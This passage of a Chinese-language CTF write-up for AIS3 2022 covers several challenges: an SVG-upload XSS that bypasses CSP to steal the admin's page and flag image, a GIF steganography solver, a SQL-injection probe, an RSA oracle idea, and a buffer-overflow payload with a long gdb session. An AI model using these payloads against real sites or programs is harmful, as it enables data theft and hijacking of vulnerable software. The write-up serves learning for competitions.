url[len(request.url_root):] app.queue.enqueue('xssbot.browse', url_path) return 'Reported.' else: return f"[ERROR] Admin 只看 {request.url_root} 網址" ``` ::: ### SVG XSS 題目可以上傳圖片 所以選用了 `SVG` 來進行 `XSS` ### Bypass CSP 由於題目有 `CSP: default-src 'self'` 不能用 `inline` 使用兩個檔案 `script1.js.svg`、`forward.svg` 上傳至伺服器 `forward.svg` 會取用 `script1.js.svg` 來執行 接著將 `forward.svg` Report 給 admin `script1.js.svg` ```javascript (async () => { // get admin home page first const payload = await fetch("/").then(e => e.text()).then(e => e) console.log(payload) // log in as wiener await fetch("/login", { "headers": { "content-type": "application/x-www-form-urlencoded", }, "body": "username=wiener&password=peter", "method": "POST", "mode": "cors", "credentials": "include" }); // transfer the data out const formData = new FormData(); formData.append("title", "js_fetch_start1") formData.append("file", new Blob([payload]), "test1.svg"); fetch("/upload", { "referrerPolicy": "strict-origin-when-cross-origin", "body": formData, "method": "POST", "mode": "cors", "credentials": "include" }); })(); ``` `forward.svg` ```html <svg width="70" height="70" viewBox="0 0 70 70" fill="none" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <rect width="70" height="70" fill="#E5E5E5"/> <g clip-path="url(#clip0)"> <rect width="70" height="70" fill="white"/> <g opacity="0.76"> <path d="M43.5 32.9019C45.5 34.0566 45.5 36.9434 43.5 38.0981L18.75 52.3875C16.75 53.5422 14.25 52.0988 14.25 49.7894L14.25 21.2106C14.25 18.9012 16.75 17.4578 18.75 18.6125L43.5 32.9019Z" fill="#CFFCCF"/> </g> <path d="M62.5001 32.9019C64.5001 34.0566 64.5001 36.9434 62.5001 38.0981L37.7501 52.3875C35.7501 53.5422 33.2501 52.0988 33.2501 49.7894L33.2501 21.2106C33.2501 18.9012 35.7501 17.4578 37.7501 18.6125L62.5001 32.9019Z" fill="#FCCFFC" fill-opacity="0.76"/> </g> <defs> <clipPath id="clip0"> <rect width="70" height="70" fill="white"/> </clipPath> </defs> <script type="text/javascript" xlink:href="/image/450bafc2-e5ba-4b77-b3e0-ef8263a479a5/download"></script> </svg> ``` Response ```html <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Gallery</title> <link rel="stylesheet" href="/static/style.css"> </head> <body> <div class="main"> <h1>Gallery</h1> <nav> <a href="/">[Home]</a> | <a href="/upload">[Upload]</a> | <a href="/report">[Report]</a> </nav> </div> <hr> <div class="main"> <h2>Images</h2> <div class="image"> <figure> <img src="/image/f4cdc213-a638-4195-9536-eafc2f635ecd" alt="FLAG"> <figcaption>> FLAG</figcaption> </figure> <div class="utils"> <a href="/image/f4cdc213-a638-4195-9536-eafc2f635ecd">[View]</a> | <a href="/image/f4cdc213-a638-4195-9536-eafc2f635ecd/download">[Download]</a> </div> </div> <div class="image"> <figure> <img src="/image/4f1e876c-3c21-41aa-85a7-c394fbc7a1be" alt="js_fetch_start1"> <figcaption>> js_fetch_start1</figcaption> </figure> <div class="utils"> <a href="/image/4f1e876c-3c21-41aa-85a7-c394fbc7a1be">[View]</a> | <a href="/image/4f1e876c-3c21-41aa-85a7-c394fbc7a1be/download">[Download]</a> </div> </div> </div> <hr> <footer> <p>&copy; 2022 Gallery</p> </footer> </body> </html> ``` ### Get The Flag `script1.js.svg` ```javascript (async () => { // get the flag const payload = await fetch("/image/f4cdc213-a638-4195-9536-eafc2f635ecd").then(e => e.blob()).then(e => e) console.log(payload) // log in as wiener await fetch("/login", { "headers": { "content-type": "application/x-www-form-urlencoded", }, "body": "username=wiener&password=peter", "method": "POST", "mode": "cors", "credentials": "include" }); // transfer the data out const formData = new FormData(); formData.append("title", "js_fetch_start1") formData.append("file", payload, "test1.svg"); fetch("/upload", { "referrerPolicy": "strict-origin-when-cross-origin", "body": formData, "method": "POST", "mode": "cors", "credentials": "include" }); })(); ``` `forward.svg` ```html <svg width="70" height="70" viewBox="0 0 70 70" fill="none" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <rect width="70" height="70" fill="#E5E5E5"/> <g clip-path="url(#clip0)"> <rect width="70" height="70" fill="white"/> <g opacity="0.76"> <path d="M43.5 32.9019C45.5 34.0566 45.5 36.9434 43.5 38.0981L18.75 52.3875C16.75 53.5422 14.25 52.0988 14.25 49.7894L14.25 21.2106C14.25 18.9012 16.75 17.4578 18.75 18.6125L43.5 32.9019Z" fill="#CFFCCF"/> </g> <path d="M62.5001 32.9019C64.5001 34.0566 64.5001 36.9434 62.5001 38.0981L37.7501 52.3875C35.7501 53.5422 33.2501 52.0988 33.2501 49.7894L33.2501 21.2106C33.2501 18.9012 35.7501 17.4578 37.7501 18.6125L62.5001 32.9019Z" fill="#FCCFFC" fill-opacity="0.76"/> </g> <defs> <clipPath id="clip0"> <rect width="70" height="70" fill="white"/> </clipPath> </defs> <script type="text/javascript" xlink:href="/image/0e14960e-3b76-4f22-8613-fbb562c5ce2e/download"></script> </svg> ``` ### Flag ![](https://i.imgur.com/bUmBaKl.png) ## Gift in the dream [100 pts] 發現 gif 的 duration 有 flag 的形狀 ![](https://i.imgur.com/SALJRUS.png) 使用 PIL 取出 ```python from PIL import Image # modified from https://www.codespeedy.com/find-the-duration-of-gif-image-in-python/ def get_durations(img_obj): img_obj.seek(0) # move to the start of the gif, frame 0 durations = [] # run a while loop to loop through the frames while True: try: frame_duration = img_obj.info['duration'] # returns current frame duration in milli sec. durations.append(frame_duration) # now move to the next frame of the gif img_obj.seek(img_obj.tell() + 1) # image.tell() = current frame except EOFError: return durations # this will return the tot_duration of the gif def main (): img = Image.open('gift_in_the_dream_updated.gif') durations = get_durations(img) flag = "" for duration in durations: if duration == 10: break flag += chr(duration // 10) # AIS3{5T3g4n0gR4pHy_c4N_b3_fUn_s0m37iMe} print(flag) if __name__ == '__main__': main() ``` --- ## Private Browsing [500 pts] ![](https://i.imgur.com/kVbPyzJ.jpg) ```shell ch@CHSMB ~ % nmap 198.13.45.97 Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-16 13:17 CST Nmap scan report for 198.13.45.97.vultrusercontent.com (198.13.45.97) Host is up (0.0062s latency). Not shown: 990 filtered tcp ports (no-response) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 6000/tcp open X11 6001/tcp open X11:1 6002/tcp open X11:2 6003/tcp open X11:3 6004/tcp open X11:4 6006/tcp open X11:6 6007/tcp open X11:7 12345/tcp open netbus Nmap done: 1 IP address (1 host up) scanned in 64.56 seconds ch@CHSMB ~ % ``` ## Cat Emoji Database 🐱 [487 pts] ### Get DBMS without Using `\s` ```url http://chals1.ais3.org:9487/api/emoji/(SELECT(128049)WHERE(@@version=@@version)) ``` DBMS: Microsoft `%C2%A0` ## Really Strange orAcle [480 pts] <!-- https://github.com/ashutosh1206/Crypton/tree/master/RSA-encryption --> ### 題目 > You have a RSA(-like) encryption oracle to use, but you know literally nothing about the public key. Can you still decrypt the flag with it? ```python from Crypto.Util.number import getStrongPrime, getRandomRange, isPrime, bytes_to_long from pathlib import Path import json import os flag = os.environb[b"FLAG"] keyfile = Path("./key.json") if keyfile.is_file(): key = json.loads(keyfile.read_text()) n = key["n"] e = key["e"] else: p = getStrongPrime(1024) n = p * p while True: e = getRandomRange(2, p) | 1 if isPrime(e): break keyfile.write_text(json.dumps({"n": n, "e": e})) flag += os.urandom(2048 // 8 - len(flag)) c = pow(bytes_to_long(flag), e, n) print(c) while True: x = int(input()) if x >= 0: print(pow(x, e, n)) ``` ### 想法 餵給題目 $a$ 得 $k = pow(a, e, n)$ $a*a$ 得 $s = pow(a*a, e, n)$ $t_i=k*k-s$ 必定為 $n$ 之倍數 多試幾次 $t_i$ 取 $gcd$ 直到 $gcd$ 是質數的完全平方數就會是 $n$ > For people who already knows p but not e, I think this page will help you a lot: https://en.wikipedia.org/wiki/Paillier_cryptosystem ## ASTJail [500 pts] ![](https://i.imgur.com/R5HC6Ku.png) ## BOF2WIN [100 pts] https://www.youtube.com/watch?v=8QzOC8HfOqU ### `main.py` ```python # get_the_flag: 0x0000000000401216 address = "\x16\x12\x40\x00\x00\x00\x00\x00" # address = "aaaabbbbccccdddd" payload = f"AAAABBBBCCCCDDDDEEEEFFFF{address}"#IIIIJJJJKKKKLLLLMMMMOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ" print(payload) # python3 main.py > exp # nc chals1.ais3.org 12347 < exp ``` ### gdb :::spoiler ```shell c@cc:~/Downloads/bof2win/share$ gdb bof2win GNU gdb (Ubuntu 12.0.90-0ubuntu1) 12.0.90 Copyright (C) 2022 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "x86_64-linux-gnu". Type "show configuration" for configuration details. For bug reporting instructions, please see: <https://www.gnu.org/software/gdb/bugs/>. Find the GDB manual and other documentation resources online at: <http://www.gnu.org/software/gdb/documentation/>. For help, type "help". Type "apropos word" to search for commands related to "word"... Reading symbols from bof2win... (No debugging symbols found in bof2win) (gdb) disassemble main Dump of assembler code for function main: 0x00000000004012a4 <+0>: endbr64 0x00000000004012a8 <+4>: push %rbp 0x00000000004012a9 <+5>: mov %rsp,%rbp 0x00000000004012ac <+8>: sub $0x10,%rsp 0x00000000004012b0 <+12>: mov 0x2dc9(%rip),%rax # 0x404080 <stdin@@GLIBC_2.2.5> 0x00000000004012b7 <+19>: mov $0x0,%ecx 0x00000000004012bc <+24>: mov $0x2,%edx 0x00000000004012c1 <+29>: mov $0x0,%esi 0x00000000004012c6 <+34>: mov %rax,%rdi 0x00000000004012c9 <+37>: call 0x401110 <setvbuf@plt> 0x00000000004012ce <+42>: mov 0x2d9b(%rip),%rax # 0x404070 <stdout@@GLIBC_2.2.5> 0x00000000004012d5 <+49>: mov $0x0,%ecx 0x00000000004012da <+54>: mov $0x2,%edx 0x00000000004012df <+59>: mov $0x0,%esi 0x00000000004012e4 <+64>: mov %rax,%rdi 0x00000000004012e7 <+67>: call 0x401110 <setvbuf@plt> 0x00000000004012ec <+72>: lea 0xd24(%rip),%rdi # 0x402017 0x00000000004012f3 <+79>: call 0x4010b0 <puts@plt> 0x00000000004012f8 <+84>: lea -0x10(%rbp),%rax 0x00000000004012fc <+88>: mov %rax,%rdi 0x00000000004012ff <+91>: mov $0x0,%eax 0x0000000000401304 <+96>: call 0x401100 <gets@plt> 0x0000000000401309 <+101>: lea -0x10(%rbp),%rax 0x000000000040130d <+105>: mov %rax,%rsi 0x0000000000401310 <+108>: lea 0xd12(%rip),%rdi # 0x402029 0x0000000000401317 <+115>: mov $0x0,%eax 0x000000000040131c <+120>: call 0x4010d0 <printf@plt> 0x0000000000401321 <+125>: mov $0x0,%eax 0x0000000000401326 <+130>: leave 0x0000000000401327 <+131>: ret End of assembler dump. (gdb) disassemble get_the_flag Dump of assembler code for function get_the_flag: 0x0000000000401216 <+0>: endbr64 0x000000000040121a <+4>: push %rbp 0x000000000040121b <+5>: mov %rsp,%rbp 0x000000000040121e <+8>: sub $0x40,%rsp 0x0000000000401222 <+12>: movq $0x0,-0x40(%rbp) 0x000000000040122a <+20>: movq $0x0,-0x38(%rbp) 0x0000000000401232 <+28>: movq $0x0,-0x30(%rbp) 0x000000000040123a <+36>: movq $0x0,-0x28(%rbp) 0x0000000000401242 <+44>: movq $0x0,-0x20(%rbp) 0x000000000040124a <+52>: movq $0x0,-0x18(%rbp) 0x0000000000401252 <+60>: mov $0x0,%esi 0x0000000000401257 <+65>: lea 0xda6(%rip),%rdi # 0x402004 0x000000000040125e <+72>: mov $0x0,%eax 0x0000000000401263 <+77>: call 0x401120 <open@plt> 0x0000000000401268 <+82>: mov %eax,-0x4(%rbp) 0x000000000040126b <+85>: lea -0x40(%rbp),%rcx 0x000000000040126f <+89>: mov -0x4(%rbp),%eax 0x0000000000401272 <+92>: mov $0x30,%edx 0x0000000000401277 <+97>: mov %rcx,%rsi 0x000000000040127a <+100>: mov %eax,%edi 0x000000000040127c <+102>: call 0x4010f0 <read@plt> 0x0000000000401281 <+107>: lea -0x40(%rbp),%rax 0x0000000000401285 <+111>: mov $0x30,%edx 0x000000000040128a <+116>: mov %rax,%rsi 0x000000000040128d <+119>: mov $0x1,%edi 0x0000000000401292 <+124>: call 0x4010c0 <write@plt> 0x0000000000401297 <+129>: mov -0x4(%rbp),%eax 0x000000000040129a <+132>: mov %eax,%edi 0x000000000040129c <+134>: call 0x4010e0 <close@plt> 0x00000000004012a1 <+139>: nop 0x00000000004012a2 <+140>: leave 0x00000000004012a3 <+141>: ret End of assembler dump. (gdb) break *main+140 Breakpoint 1 at 0x401330 (gdb) run < exp Starting program: /home/c/Downloads/bof2win/share/bof2win < exp [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". Breakpoint 1, 0x0000000000401330 in __libc_csu_init () (gdb) info registers rax 0x7ffff7fa4200 140737353761280 rbx 0x0 0 rcx 0x401330 4199216 rdx 0x7fffffffe048 140737488347208 rsi 0x7fffffffe038 140737488347192 rdi 0x1 1 rbp 0x1 0x1 rsp 0x7fffffffdfc8 0x7fffffffdfc8 r8 0x7ffff7f9df10 140737353735952 r9 0x7ffff7fc9040 140737353912384 r10 0x7ffff7fc3860 140737353889888 r11 0x206 518 r12 0x7fffffffe038 140737488347192 r13 0x4012a4 4199076 r14 0x0 0 r15 0x401330 4199216 rip 0x401330 0x401330 <__libc_csu_init> eflags 0x206 [ PF IF ] cs 0x33 51 ss 0x2b 43 ds 0x0 0 es 0x0 0 fs 0x0 0 gs 0x0 0 (gdb) info frame Stack level 0, frame at 0x7fffffffdfd0: rip = 0x401330 in __libc_csu_init; saved rip = 0x7ffff7dace1c called by frame at 0x7fffffffe020 Arglist at 0x7fffffffdfc0, args: Locals at 0x7fffffffdfc0, Previous frame's sp is 0x7fffffffdfd0 Saved registers: rip at 0x7fffffffdfc8 (gdb) disassemble get_the_flag Dump of assembler code for function get_the_flag: 0x0000000000401216 <+0>: endbr64 0x000000000040121a <+4>: push %rbp 0x000000000040121b <+5>: mov %rsp,%rbp 0x000000000040121e <+8>: sub $0x40,%rsp 0x0000000000401222 <+12>: movq $0x0,-0x40(%rbp) 0x000000000040122a <+20>: movq $0x0,-0x38(%rbp) 0x0000000000401232 <+28>: movq $0x0,-0x30(%rbp) 0x000000000040123a <+36>: movq $0x0,-0x28(%rbp) 0x0000000000401242 <+44>: movq $0x0,-0x20(%rbp) 0x000000000040124a <+52>: movq $0x0,-0x18(%rbp) 0x0000000000401252 <+60>: mov $0x0,%esi 0x0000000000401257 <+65>: lea 0xda6(%rip),%rdi # 0x402004 0x000000000040125e <+72>: mov $0x0,%eax 0x0000000000401263 <+77>: call 0x401120 <open@plt> 0x0000000000401268 <+82>: mov %eax,-0x4(%rbp) 0x000000000040126b <+85>: lea -0x40(%rbp),%rcx 0x000000000040126f <+89>: mov -0x4(%rbp),%eax 0x0000000000401272 <+92>: mov $0x30,%edx 0x0000000000401277 <+97>: mov %rcx,%rsi 0x000000000040127a <+100>: mov %eax,%edi 0x000000000040127c <+102>: call 0x4010f0 <read@plt> 0x0000000000401281 <+107>: lea -0x40(%rbp),%rax 0x0000000000401285 <+111>: mov $0x30,%edx 0x000000000040128a <+116>: mov %rax,%rsi 0x000000000040128d <+119>: mov $0x1,%edi 0x0000000000401292 <+124>: call 0x4010c0 <write@plt> 0x0000000000401297 <+129>: mov -0x4(%rbp),%eax 0x000000000040129a <+132>: mov %eax,%edi 0x000000000040129c <+134>: call 0x4010e0 <close@plt> 0x00000000004012a1 <+139>: nop 0x00000000004012a2 <+140>: leave 0x00000000004012a3 <+141>: ret End of assembler dump. (gdb) disassemble main Dump of assembler code for function main: 0x00000000004012a4 <+0>: endbr64 0x00000000004012a8 <+4>: push %rbp 0x00000000004012a9 <+5>: mov %rsp,%rbp 0x00000000004012ac <+8>: sub $0x10,%rsp 0x00000000004012b0 <+12>: mov 0x2dc9(%rip),%rax # 0x404080 <stdin@@GLIBC_2.2.5> 0x00000000004012b7 <+19>: mov $0x0,%ecx 0x00000000004012bc <+24>: mov $0x2,%edx 0x00000000004012c1 <+29>: mov $0x0,%esi 0x00000000004012c6 <+34>: mov %rax,%rdi 0x00000000004012c9 <+37>: call 0x401110 <setvbuf@plt> 0x00000000004012ce <+42>: mov 0x2d9b(%rip),%rax # 0x404070 <stdout@@GLIBC_2.2.5> 0x00000000004012d5 <+49>: mov $0x0,%ecx 0x00000000004012da <+54>: mov $0x2,%edx 0x00000000004012df <+59>: mov $0x0,%esi 0x00000000004012e4 <+64>: mov %rax,%rdi 0x00000000004012e7 <+67>: call 0x401110 <setvbuf@plt> 0x00000000004012ec <+72>: lea 0xd24(%rip),%rdi # 0x402017 0x00000000004012f3 <+79>: call 0x4010b0 <puts@plt> 0x00000000004012f8 <+84>: lea -0x10(%rbp),%rax 0x00000000004012fc <+88>: mov %rax,%rdi 0x00000000004012ff <+91>: mov $0x0,%eax 0x0000000000401304 <+96>: call 0x401100 <gets@plt> 0x0000000000401309 <+101>: lea -0x10(%rbp),%rax 0x000000000040130d <+105>: mov %rax,%rsi 0x0000000000401310 <+108>: lea 0xd12(%rip),%rdi # 0x402029 0x0000000000401317 <+115>: mov $0x0,%eax 0x000000000040131c <+120>: call 0x4010d0 <printf@plt> 0x0000000000401321 <+125>: mov $0x0,%eax 0x0000000000401326 <+130>: leave 0x0000000000401327 <+131>: ret End of assembler dump. (gdb) ni 0x0000000000401334 in __libc_csu_init () (gdb) 0x0000000000401336 in __libc_csu_init () (gdb) 0x000000000040133d in __libc_csu_init () (gdb) 0x000000000040133f in __libc_csu_init () (gdb) 0x0000000000401342 in __libc_csu_init () (gdb) 0x0000000000401344 in __libc_csu_init () (gdb) 0x0000000000401347 in __libc_csu_init () (gdb) 0x0000000000401349 in __libc_csu_init () (gdb) 0x000000000040134c in __libc_csu_init () (gdb) 0x000000000040134d in __libc_csu_init () (gdb) 0x0000000000401354 in __libc_csu_init () (gdb) 0x0000000000401355 in __libc_csu_init () (gdb) 0x0000000000401358 in __libc_csu_init () (gdb) 0x000000000040135c in __libc_csu_init () (gdb) 0x0000000000401361 in __libc_csu_init () (gdb) 0x0000000000401365 in __libc_csu_init () (gdb) 0x0000000000401367 in __libc_csu_init () (gdb) 0x0000000000401369 in __libc_csu_init () (gdb) 0x0000000000401370 in __libc_csu_init () (gdb) 0x0000000000401373 in __libc_csu_init () (gdb) 0x0000000000401376 in __libc_csu_init () (gdb) 0x0000000000401379 in __libc_csu_init () (gdb) 0x000000000040137d in __libc_csu_init () (gdb) 0x0000000000401381 in __libc_csu_init () (gdb) 0x0000000000401384 in __libc_csu_init () (gdb) 0x0000000000401386 in __libc_csu_init () (gdb) 0x000000000040138a in __libc_csu_init () (gdb) 0x000000000040138b in __libc_csu_init () (gdb) 0x000000000040138c in __libc_csu_init () (gdb) 0x000000000040138e in __libc_csu_init () (gdb) 0x0000000000401390 in __libc_csu_init () (gdb) 0x0000000000401392 in __libc_csu_init () (gdb) 0x0000000000401394 in __libc_csu_init () (gdb) 0x00007ffff7dace1c in __libc_start_main_impl (main=0x4012a4 <main>, argc=1, argv=0x7fffffffe038, init=0x401330 <__libc_csu_init>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe028) at ../csu/libc-start.c:375 375 ../csu/libc-start.c: No such file or directory. (gdb) 382 in ../csu/libc-start.c (gdb) 0x00007ffff7dace26 382 in ../csu/libc-start.c (gdb) 384 in ../csu/libc-start.c (gdb) 0x00007ffff7dace2d 384 in ../csu/libc-start.c (gdb) 392 in ../csu/libc-start.c (gdb) 0x00007ffff7dace36 392 in ../csu/libc-start.c (gdb) 0x00007ffff7dace38 392 in ../csu/libc-start.c (gdb) 0x00007ffff7dace3b 392 in ../csu/libc-start.c (gdb) What's your name? Hello, AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ! Program received signal SIGSEGV, Segmentation fault. 0x0000000000401327 in main () (gdb) Program terminated with signal SIGSEGV, Segmentation fault. The program no longer exists. (gdb) The program is not being run. (gdb) The program is not being run. (gdb) clear No source file specified. (gdb) clear *main+140 Deleted breakpoint 1 (gdb) disassemble main Dump of assembler code for function main: 0x00000000004012a4 <+0>: endbr64 0x00000000004012a8 <+4>: push %rbp 0x00000000004012a9 <+5>: mov %rsp,%rbp 0x00000000004012ac <+8>: sub $0x10,%rsp 0x00000000004012b0 <+12>: mov 0x2dc9(%rip),%rax # 0x404080 <stdin@@GLIBC_2.2.5> 0x00000000004012b7 <+19>: mov $0x0,%ecx 0x00000000004012bc <+24>: mov $0x2,%edx 0x00000000004012c1 <+29>: mov $0x0,%esi 0x00000000004012c6 <+34>: mov %rax,%rdi 0x00000000004012c9 <+37>: call 0x401110 <setvbuf@plt> 0x00000000004012ce <+42>: mov 0x2d9b(%rip),%rax # 0x404070 <stdout@@GLIBC_2.2.5> 0x00000000004012d5 <+49>: mov $0x0,%ecx 0x00000000004012da <+54>: mov $0x2,%edx 0x00000000004012df <+59>: mov $0x0,%esi 0x00000000004012e4 <+64>: mov %rax,%rdi 0x00000000004012e7 <+67>: call 0x401110 <setvbuf@plt> 0x00000000004012ec <+72>: lea 0xd24(%rip),%rdi # 0x402017 0x00000000004012f3 <+79>: call 0x4010b0 <puts@plt> 0x00000000004012f8 <+84>: lea -0x10(%rbp),%rax 0x00000000004012fc <+88>: mov %rax,%rdi 0x00000000004012ff <+91>: mov $0x0,%eax 0x0000000000401304 <+96>: call 0x401100 <gets@plt> 0x0000000000401309 <+101>: lea -0x10(%rbp),%rax 0x000000000040130d <+105>: mov %rax,%rsi 0x0000000000401310 <+108>: lea 0xd12(%rip),%rdi # 0x402029 0x0000000000401317 <+115>: mov $0x0,%eax 0x000000000040131c <+120>: call 0x4010d0 <printf@plt> 0x0000000000401321 <+125>: mov $0x0,%eax 0x0000000000401326 <+130>: leave 0x0000000000401327 <+131>: ret End of assembler dump. (gdb) break *main+130 Breakpoint 2 at 0x401326 (gdb) run < exp Starting program: /home/c/Downloads/bof2win/share/bof2win < exp [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". What's your name? Hello, AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ! Breakpoint 2, 0x0000000000401326 in main () (gdb) info registers rax 0x0 0 rbx 0x0 0 rcx 0x7ffff7e97a37 140737352661559 rdx 0x0 0 rsi 0x7fffffffbdf0 140737488338416 rdi 0x7fffffffbcd0 140737488338128 rbp 0x7fffffffdf20 0x7fffffffdf20 rsp 0x7fffffffdf10 0x7fffffffdf10 r8 0x6d 109 r9 0x7fffffff 2147483647 r10 0x0 0 r11 0x246 582 r12 0x7fffffffe038 140737488347192 r13 0x4012a4 4199076 r14 0x0 0 r15 0x7ffff7ffd040 140737354125376 rip 0x401326 0x401326 <main+130> eflags 0x202 [ IF ] cs 0x33 51 ss 0x2b 43 ds 0x0 0 es 0x0 0 fs 0x0 0 gs 0x0 0 (gdb) info frame Stack level 0, frame at 0x7fffffffdf30: rip = 0x401326 in main; saved rip = 0x4848484847474747 Arglist at 0x7fffffffdf20, args: Locals at 0x7fffffffdf20, Previous frame's sp is 0x7fffffffdf30 Saved registers: rbp at 0x7fffffffdf20, rip at 0x7fffffffdf28 (gdb) break *main+131 Breakpoint 3 at 0x401327 (gdb) c Continuing. Breakpoint 3, 0x0000000000401327 in main () (gdb) info registers rax 0x0 0 rbx 0x0 0 rcx 0x7ffff7e97a37 140737352661559 rdx 0x0 0 rsi 0x7fffffffbdf0 140737488338416 rdi 0x7fffffffbcd0 140737488338128 rbp 0x4646464645454545 0x4646464645454545 rsp 0x7fffffffdf28 0x7fffffffdf28 r8 0x6d 109 r9 0x7fffffff 2147483647 r10 0x0 0 r11 0x246 582 r12 0x7fffffffe038 140737488347192 r13 0x4012a4 4199076 r14 0x0 0 r15 0x7ffff7ffd040 140737354125376 rip 0x401327 0x401327 <main+131> eflags 0x202 [ IF ] cs 0x33 51 ss 0x2b 43 ds 0x0 0 es 0x0 0 fs 0x0 0 gs 0x0 0 (gdb) info frame Stack level 0, frame at 0x7fffffffdf28: rip = 0x401327 in main; saved rip = 0x4848484847474747 Arglist at 0x4646464645454545, args: Locals at 0x4646464645454545, Previous frame's sp is 0x7fffffffdf30 Saved registers: rip at 0x7fffffffdf28 (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x0000000000401327 in main () (gdb) run < exp The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/c/Downloads/bof2win/share/bof2win < exp [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". What's your name? Hello, AAAABBBBCCCCDDDDEEEEFFFF@! Breakpoint 2, 0x0000000000401326 in main () (gdb) info frame Stack level 0, frame at 0x7fffffffdf30: rip = 0x401326 in main; saved rip = 0x401216 Arglist at 0x7fffffffdf20, args: Locals at 0x7fffffffdf20, Previous frame's sp is 0x7fffffffdf30 Saved registers: rbp at 0x7fffffffdf20, rip at 0x7fffffffdf28 (gdb) c Continuing. Breakpoint 3, 0x0000000000401327 in main () (gdb) info frame Stack level 0, frame at 0x7fffffffdf28: rip = 0x401327 in main; saved rip = 0x401216 Arglist at 0x4646464645454545, args: Locals at 0x4646464645454545, Previous frame's sp is 0x7fffffffdf30 Saved registers: rip at 0x7fffffffdf28 (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x00000000004012a3 in get_the_flag () (gdb) disassemble get_the_flag Dump of assembler code for function get_the_flag: 0x0000000000401216 <+0>: endbr64 0x000000000040121a <+4>: push %rbp 0x000000000040121b <+5>: mov %rsp,%rbp 0x000000000040121e <+8>: sub $0x40,%rsp 0x0000000000401222 <+12>: movq $0x0,-0x40(%rbp) 0x000000000040122a <+20>: movq $0x0,-0x38(%rbp) 0x0000000000401232 <+28>: movq $0x0,-0x30(%rbp) 0x000000000040123a <+36>: movq $0x0,-0x28(%rbp) 0x0000000000401242 <+44>: movq $0x0,-0x20(%rbp) 0x000000000040124a <+52>: movq $0x0,-0x18(%rbp) 0x0000000000401252 <+60>: mov $0x0,%esi 0x0000000000401257 <+65>: lea 0xda6(%rip),%rdi # 0x402004 0x000000000040125e <+72>: mov $0x0,%eax 0x0000000000401263 <+77>: call 0x401120 <open@plt> 0x0000000000401268 <+82>: mov %eax,-0x4(%rbp) 0x000000000040126b <+85>: lea -0x40(%rbp),%rcx 0x000000000040126f <+89>: mov -0x4(%rbp),%eax 0x0000000000401272 <+92>: mov $0x30,%edx 0x0000000000401277 <+97>: mov %rcx,%rsi 0x000000000040127a <+100>: mov %eax,%edi 0x000000000040127c <+102>: call 0x4010f0 <read@plt> 0x0000000000401281 <+107>: lea -0x40(%rbp),%rax 0x0000000000401285 <+111>: mov $0x30,%edx 0x000000000040128a <+116>: mov %rax,%rsi 0x000000000040128d <+119>: mov $0x1,%edi 0x0000000000401292 <+124>: call 0x4010c0 <write@plt> 0x0000000000401297 <+129>: mov -0x4(%rbp),%eax 0x000000000040129a <+132>: mov %eax,%edi 0x000000000040129c <+134>: call 0x4010e0 <close@plt> 0x00000000004012a1 <+139>: nop 0x00000000004012a2 <+140>: leave => 0x00000000004012a3 <+141>: ret End of assembler dump. (gdb) run < exp The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/c/Downloads/bof2win/share/bof2win < exp [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". What's your name? Hello, AAAABBBBCCCCDDDDEEEEFFFF@! Breakpoint 2, 0x0000000000401326 in main () (gdb) c Continuing. Breakpoint 3, 0x0000000000401327 in main () (gdb) info frame Stack level 0, frame at 0x7fffffffdf28: rip = 0x401327 in main; saved rip = 0x401216 Arglist at 0x4646464645454545, args: Locals at 0x4646464645454545, Previous frame's sp is 0x7fffffffdf30 Saved registers: rip at 0x7fffffffdf28 (gdb) disassemble main Dump of assembler code for function main: 0x00000000004012a4 <+0>: endbr64 0x00000000004012a8 <+4>: push %rbp 0x00000000004012a9 <+5>: mov %rsp,%rbp 0x00000000004012ac <+8>: sub $0x10,%rsp 0x00000000004012b0 <+12>: mov 0x2dc9(%rip),%rax # 0x404080 <stdin@@GLIBC_2.2.5> 0x00000000004012b7 <+19>: mov $0x0,%ecx 0x00000000004012bc <+24>: mov $0x2,%edx 0x00000000004012c1 <+29>: mov $0x0,%esi 0x00000000004012c6 <+34>: mov %rax,%rdi 0x00000000004012c9 <+37>: call 0x401110 <setvbuf@plt> 0x00000000004012ce <+42>: mov 0x2d9b(%rip),%rax # 0x404070 <stdout@@GLIBC_2.2.5> 0x00000000004012d5 <+49>: mov $0x0,%ecx 0x00000000004012da <+54>: mov $0x2,%edx 0x00000000004012df <+59>: mov $0x0,%esi 0x00000000004012e4 <+64>: mov %rax,%rdi 0x00000000004012e7 <+67>: call 0x401110 <setvbuf@plt> 0x00000000004012ec <+72>: lea 0xd24(%rip),%rdi # 0x402017 0x00000000004012f3 <+79>: call 0x4010b0 <puts@plt> 0x00000000004012f8 <+84>: lea -0x10(%rbp),%rax 0x00000000004012fc <+88>: mov %rax,%rdi 0x00000000004012ff <+91>: mov $0x0,%eax 0x0000000000401304 <+96>: call 0x401100 